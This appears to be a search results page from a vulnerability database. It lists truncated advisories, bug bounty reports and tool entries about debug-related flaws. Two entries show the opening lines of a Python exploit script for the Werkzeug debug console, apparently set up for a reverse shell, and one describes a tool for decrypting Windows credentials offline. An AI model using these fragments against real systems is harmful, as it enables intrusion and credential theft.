8310 matches found
LaZagneForensic - Decrypt Windows Credentials From Another Host
LaZagne uses an internal Windows API called CryptUnprotectData to decrypt user passwords. This API should be called on the victim user session, otherwise, it does not work. If the computer has not been started when the analysis is realized on an offline mounted disk, or if we do not want to drop ...
UBUNTU-CVE-2018-6543
In GNU Binutils 2.30, there's an integer overflow in the function loadspecificdebugsection in objdump.c, which results in malloc with 0 size. A crafted ELF file allows remote attackers to cause a denial of service application crash or possibly have unspecified other impact...
ALPINE-CVE-2018-6543
In GNU Binutils 2.30, there's an integer overflow in the function loadspecificdebugsection in objdump.c, which results in malloc with 0 size. A crafted ELF file allows remote attackers to cause a denial of service application crash or possibly have unspecified other impact...
DEBIAN-CVE-2018-6543
In GNU Binutils 2.30, there's an integer overflow in the function loadspecificdebugsection in objdump.c, which results in malloc with 0 size. A crafted ELF file allows remote attackers to cause a denial of service application crash or possibly have unspecified other impact...
X (Formerly Twitter): ms5 debug page exposing internal info (internal IPs, headers)
Summary: Information exposure through /debug in ms5.twitter.com Description: Debug page from ms5.twitter.com exposes internal info, such as internal IPs and headers. Steps To Reproduce: 1. Visit ms5.twitter.com/debug 1. See internal IP and header-names used 1. To gather more internal IPs, just...
CentOS 6 : kernel (CESA-2018:0169)
The remote CentOS host is missing a security update. C Tenable Network Security, Inc. The package checks in this plugin were extracted from CentOS Errata and Security Advisory 2018:0169. include"compat.inc"; if description scriptid106535; scriptversion"3.3"; scriptcvsdate"Date: 2019/10/02...
Werkzeug - 'Debug Shell' Command Execution
!/usr/bin/env python import requests import sys import re import urllib usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if lensys.argv != 5: print "USAGE: python %s " % sys.argv0 sys.exit-1 response = requests.get'http://%s:%s/console' % sys.argv1,sys.argv2 if "Werkzeug " not in...
Werkzeug - Debug Shell Command Execution
Werkzeug - Debug Shell Command Execution !/usr/bin/env python import requests import sys import re import urllib usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if lensys.argv != 5: print "USAGE: python %s " % sys.argv0 sys.exit-1 response = requests.get'http://%s:%s/console' %...
Cross site scripting
In Yii Framework 2.x before 2.0.14, remote attackers could obtain potentially sensitive information from exception messages, or exploit reflected XSS on the error handler page in non-debug mode. Related to base/ErrorHandler.php, log/Dispatcher.php, and views/errorHandler/exception.php...
Remote attackers could obtain potentially sensitive information from exception messages printed by the error handler in non-debug mode.
More info at https://www.yiiframework.com/news/165/yii-2-0-14-is-released/...
Remote attackers could obtain potentially sensitive information from exception messages printed by the error handler in non-debug mode.
More info at https://www.yiiframework.com/news/165/yii-2-0-14-is-released/...
Debian DLA-1253-1 : openocd security update
OpenOCD, an on-chip JTAG debug solution for ARM and MIPS systems, does not block attempts to use HTTP POST for sending data to localhost, which allows remote attackers to conduct cross-protocol scripting attacks, and consequently execute arbitrary commands, via a crafted website. For Debian 7...
createyourreel.com XSS vulnerability
Open Bug Bounty ID: OBB-524087 Description| Value ---|--- Affected Website:| createyourreel.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...
Fedora 27 : php-PHPMailer (2017-4b3873b325)
Version 5.2.26 November 4th 2017 - Minor security backport from 6.0 - set Debugoutput in constructor according to SAPI in use, avoiding potential XSS in default debug output. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system...
Grab: Unrestricted access to https://██████.█████myteksi.net/
Hello again Grab Security Team ! Following my previous research, it seems that your Microservices architecture you are currently running on .█████myteksi.net is publicly exposed on another endpoint : https://█████████.█████myteksi.net. Summary: When researching and starting a new enumeration of...
CPP-Ethereum JSON-RPC Denial Of Service Vulnerabilities(CVE-2017-12119)
Summary An exploitable unhandled exception vulnerability exists in multiple APIs of CPP-Ethereum's JSON-RPC. Specially crafted JSON requests can cause a unhandled exception resulting in denial of service. An attacker can send malicious JSON to trigger this vulnerability. Tested Versions Ethereum...
kernel-tmb update provides 4.14 series and fixes security vulnerabilities
This kernel-tmb update provides an upgrade to the 4.14 longterm branch, currently based on 4.14.10. It also fixes at least the following security issues: An elevation of privilege vulnerability in the Broadcom wi-fi driver CVE-2017-0786. Use-after-free vulnerability in the sndpcminfo function in...
MGASA-2018-0062 kernel update provides 4.14 series and fixes security vulnerabilities
This kernel update provides an upgrade to the 4.14 longterm branch, currently based on 4.14.10. It also fixes at least the following security issues: An elevation of privilege vulnerability in the Broadcom wi-fi driver CVE-2017-0786. Use-after-free vulnerability in the sndpcminfo function in the...
kernel update provides 4.14 series and fixes security vulnerabilities
This kernel update provides an upgrade to the 4.14 longterm branch, currently based on 4.14.10. It also fixes at least the following security issues: An elevation of privilege vulnerability in the Broadcom wi-fi driver CVE-2017-0786. Use-after-free vulnerability in the sndpcminfo function in the...
Immunity Canvas: SPECTRE_SAM_LEAK
Name| spectresamleak ---|--- CVE| CVE-2017-5753-1 Exploit Pack| CANVAS Description| Spectre Sam Leak Notes| CVE Name: CVE-2017-5753 Notes: The final version should also handle Windows 2016 and 10. In fact the backend is perfectly working on Windows 2016 but libwincreds is not able to deal with...